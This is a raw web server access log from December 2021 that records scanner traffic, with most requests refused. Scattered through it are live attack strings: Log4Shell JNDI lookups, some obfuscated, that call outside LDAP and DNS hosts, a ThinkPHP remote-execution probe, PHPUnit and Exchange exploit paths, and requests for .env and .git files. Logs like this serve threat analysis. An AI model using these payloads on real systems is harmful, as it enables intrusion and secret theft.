+0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [11/Dec/2021:02:57:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [11/Dec/2021:03:07:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.207.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Dec/2021:03:30:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Dec/2021:03:34:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Dec/2021:04:28:45 +0000] 444 - POST https 64.22.31.253 "/owa/auth.owa" [Client 176.125.235.107] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" "-" [11/Dec/2021:08:50:29 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [11/Dec/2021:08:50:30 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [11/Dec/2021:09:19:24 +0000] 444 - GET https localhost "/api/blog/5e09fe7d-84f5-4630-90c6-c0a838627227" [Client 109.248.6.239] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [11/Dec/2021:09:23:29 +0000] 444 - POST https 64.22.31.253 "/ecp/rCE.js" [Client 91.121.233.201] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [11/Dec/2021:09:42:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [11/Dec/2021:13:25:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [11/Dec/2021:13:36:23 +0000] 444 - GET https home.moralanimal.net "/" [Client 69.197.185.43] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [11/Dec/2021:13:39:27 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Dec/2021:14:33:10 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.144.225.46] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [11/Dec/2021:15:12:08 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [11/Dec/2021:15:59:33 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [11/Dec/2021:16:40:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Dec/2021:18:06:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 188.166.45.93] [Length 0] [Gzip -] "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}" "-" [11/Dec/2021:19:15:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Dec/2021:19:17:08 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.204.149] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Dec/2021:19:18:52 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Dec/2021:19:44:05 +0000] 444 - GET https 64.22.31.253 "/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D" [Client 188.166.45.93] [Length 0] [Gzip -] "Kryptos Logic Telltale" "-" [11/Dec/2021:20:43:42 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 185.156.73.104] [Length 0] [Gzip -] "IDBTE4M CODE87" "-" [11/Dec/2021:22:22:53 +0000] 444 - GET https localhost "/" [Client 109.248.6.130] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [11/Dec/2021:23:29:19 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [11/Dec/2021:23:57:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [12/Dec/2021:00:03:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:00:10:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [12/Dec/2021:01:38:46 +0000] 444 - GET https 64.22.31.253 "/remote/login?lang=en" [Client 89.248.173.131] [Length 0] [Gzip -] "python-requests/2.21.0" "-" [12/Dec/2021:02:09:23 +0000] 400 - GET https localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:02:09:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [12/Dec/2021:02:11:37 +0000] 400 - GET http i.pixita.com "/robots.txt" [Client 194.110.13.91] [Length 252] [Gzip -] "-" "-" [12/Dec/2021:02:11:37 +0000] 400 - GET http i.pixita.com "/robots.txt" [Client 5.253.204.122] [Length 252] [Gzip -] "-" "-" [12/Dec/2021:02:11:37 +0000] 400 - - http localhost "-" [Client 91.90.124.12] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:02:11:37 +0000] 400 - - http localhost "-" [Client 193.56.252.221] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:02:11:38 +0000] 400 - - http localhost "-" [Client 46.183.218.152] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:02:11:38 +0000] 400 - - http localhost "-" [Client 188.126.89.142] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:02:48:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.90] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:02:49:38 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.61.146.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "-" [12/Dec/2021:02:49:39 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 45.61.146.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "-" [12/Dec/2021:03:08:34 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.237] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:04:42:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.67] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:06:12:33 +0000] 400 - GET http localhost "/" [Client 80.82.70.228] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1" "-" [12/Dec/2021:08:05:15 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [12/Dec/2021:08:11:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 207.154.214.136] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [12/Dec/2021:08:56:28 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com" [Client 188.214.125.151] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [12/Dec/2021:10:50:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.164.154] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:10:57:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [12/Dec/2021:10:57:52 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211212185752" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [12/Dec/2021:11:49:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 131.100.148.7] [Length 0] [Gzip -] "curl/7.58.0" "-" [12/Dec/2021:11:49:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 131.100.148.7] [Length 0] [Gzip -] "curl/7.58.0" "-" [12/Dec/2021:11:49:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 131.100.148.7] [Length 0] [Gzip -] "curl/7.58.0" "-" [12/Dec/2021:11:49:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 131.100.148.7] [Length 0] [Gzip -] "curl/7.58.0" "-" [12/Dec/2021:12:06:25 +0000] 444 - GET https io.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [12/Dec/2021:12:10:41 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:12:38:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 120.52.152.19] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [12/Dec/2021:12:38:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.26.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [12/Dec/2021:12:39:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.236] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [12/Dec/2021:13:00:16 +0000] 444 - GET https mosquitto.moralanimal.net "/" [Client 69.197.185.43] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [12/Dec/2021:13:52:00 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Dec/2021:14:16:45 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Dec/2021:15:14:41 +0000] 444 - POST https 64.22.31.253 "/autodiscover/autodiscover.json?a=a@edu.edu/ews/exchange.asmx" [Client 45.155.204.88] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36." "-" [12/Dec/2021:16:09:14 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [12/Dec/2021:16:53:08 +0000] 444 - GET https 64.22.31.253 "/$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D" [Client 195.201.175.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:16:57:13 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Dec/2021:17:08:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.147] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:17:22:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:17:22:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.113] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:17:22:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [12/Dec/2021:17:22:56 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "-" "-" [12/Dec/2021:17:22:56 +0000] 400 - GET http opds.moralanimal.net "/" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [12/Dec/2021:17:24:09 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; MI 5s Plus Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043906 Mobile Safari/537.36 MicroMessenger/6.6.2.1240(0x26060235) NetType/4G Language/zh_CN" "-" [12/Dec/2021:17:24:09 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36" "-" [12/Dec/2021:17:24:14 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:17:34:57 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Dec/2021:17:56:05 +0000] 444 - GET https 64.22.31.253 "/$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D" [Client 42.159.91.12] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:18:00:48 +0000] 400 - - http localhost "-" [Client 78.128.112.18] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:18:12:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 3.8.136.111] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [12/Dec/2021:18:12:44 +0000] 400 - GET http 64.22.31.253 "//favicon.ico" [Client 3.8.136.111] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [12/Dec/2021:18:12:55 +0000] 400 - GET http 64.22.31.253 "//cgi-bin/login.cgi" [Client 3.8.136.111] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [12/Dec/2021:18:13:05 +0000] 400 - GET http 64.22.31.253 "//doc/page/login.asp" [Client 3.8.136.111] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [12/Dec/2021:19:10:37 +0000] 444 - GET https 64.22.31.253 "/admin/assets/js/views/login.js" [Client 193.29.14.156] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [12/Dec/2021:19:37:02 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [12/Dec/2021:19:38:26 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [12/Dec/2021:20:07:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.44] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:20:07:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.44] [Length 252] [Gzip -] "-" "-" [12/Dec/2021:20:07:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.195] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:20:07:05 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "-" "-" [12/Dec/2021:20:22:59 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:20:22:59 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:20:58:37 +0000] 400 - - http localhost "-" [Client 79.124.62.106] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:21:01:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.143] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [12/Dec/2021:21:01:36 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.147] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:21:01:37 +0000] 444 - OPTIONS https localhost "/" [Client 107.189.28.241] [Length 0] [Gzip -] "-" "-" [12/Dec/2021:21:01:38 +0000] 400 - - https localhost "-" [Client 107.189.28.241] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:21:01:46 +0000] 400 - - https localhost "-" [Client 107.189.28.241] [Length 154] [Gzip -] "-" "-" [12/Dec/2021:21:25:23 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.210.40] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:21:42:39 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.211.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:21:45:44 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.209.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:21:46:27 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [12/Dec/2021:22:17:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [12/Dec/2021:22:44:32 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [12/Dec/2021:23:51:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [13/Dec/2021:01:15:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.216.68] [Length 0] [Gzip -] "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" "-" [13/Dec/2021:01:53:00 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [13/Dec/2021:02:23:46 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Dec/2021:02:23:46 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Dec/2021:02:46:50 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.208.48] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:02:55:16 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.196.90] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:03:06:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.160] [Length 0] [Gzip -] "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}" "-" [13/Dec/2021:03:13:45 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.209] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:03:17:41 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [13/Dec/2021:03:37:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.183.239.155] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [13/Dec/2021:04:31:08 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [13/Dec/2021:04:57:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.204.24.28] [Length 0] [Gzip -] "curl/7.58.0" "-" [13/Dec/2021:04:57:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.204.24.28] [Length 0] [Gzip -] "curl/7.58.0" "-" [13/Dec/2021:04:57:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.204.24.28] [Length 0] [Gzip -] "curl/7.58.0" "-" [13/Dec/2021:04:57:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.204.24.28] [Length 0] [Gzip -] "curl/7.58.0" "-" [13/Dec/2021:05:21:28 +0000] 444 - GET https 64.22.31.253 "/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D" [Client 45.83.66.125] [Length 0] [Gzip -] "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}" [13/Dec/2021:05:37:22 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:05:44:37 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 69.197.185.43] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [13/Dec/2021:05:50:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [13/Dec/2021:06:19:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.58] [Length 0] [Gzip -] "-" "-" [13/Dec/2021:06:19:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.58] [Length 252] [Gzip -] "-" "-" [13/Dec/2021:06:19:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Dec/2021:07:10:28 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:08:12:44 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:11:15:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.67] [Length 0] [Gzip -] "-" "-" [13/Dec/2021:12:04:53 +0000] 444 - GET https 64.22.31.253 "/$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D" [Client 170.210.45.163] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:12:09:18 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.143] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:12:11:17 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:12:35:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.96] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Dec/2021:12:40:31 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.109.163] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [13/Dec/2021:12:45:36 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:12:55:33 +0000] 444 - GET https webmail.moralanimal.net "/" [Client 82.165.67.178] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "-" [13/Dec/2021:13:15:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Dec/2021:14:30:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip 